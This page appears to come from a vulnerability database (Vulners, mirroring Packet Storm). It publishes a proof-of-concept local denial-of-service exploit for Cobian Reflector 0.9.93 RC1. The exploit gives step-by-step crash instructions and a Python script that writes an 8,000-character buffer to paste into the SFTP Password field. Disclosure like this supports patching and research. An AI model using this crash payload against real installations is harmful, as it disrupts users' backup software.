Lucene search
K

Cobian Reflector 0.9.93 RC1 Denial Of Service

🗓️ 28 Feb 2022 00:00:00Reported by Luis MartinezType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 216 Views

Cobian Reflector 0.9.93 RC1 Denial Of Service through 'Password' fiel

Code
`# Exploit Title: Cobian Reflector 0.9.93 RC1 - 'Password' Denial of Service (PoC)  
# Discovery by: Luis Martinez  
# Discovery Date: 2022-02-16  
# Vendor Homepage: https://www.cobiansoft.com/  
# Software Link: https://files.cobiansoft.com/programs/crSetup-0.9.93-RC1.exe  
# Tested Version: 0.9.93 RC1  
# Vulnerability Type: Denial of Service (DoS) Local  
# Tested on OS: Windows 10 Pro x64 es  
  
# Steps to Produce the Crash:  
# 1.- Run python code: Cobian_Reflector_0.9.93_RC1.py  
# 2.- Open Cobian_Reflector_0.9.93_RC1.txt and copy content to clipboard  
# 3.- Open "Cobian Reflector User Interface"  
# 4.- Task -> "New task"  
# 5.- Files -> Source "Add" -> SFTP  
# 6.- Host -> 10.10.10.10  
# 7.- Port-> 22  
# 8.- User name -> admin  
# 9.- Paste ClipBoard on "Password"  
# 10.- Test settings  
# 11.- Yes  
# 12.- Crashed  
  
#!/usr/bin/env python  
  
buffer = "\x41" * 8000  
f = open ("Cobian_Reflector_0.9.93_RC1.txt", "w")  
f.write(buffer)  
f.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Feb 2022 00:00Current
0.1Low risk
Vulners AI Score0.1
216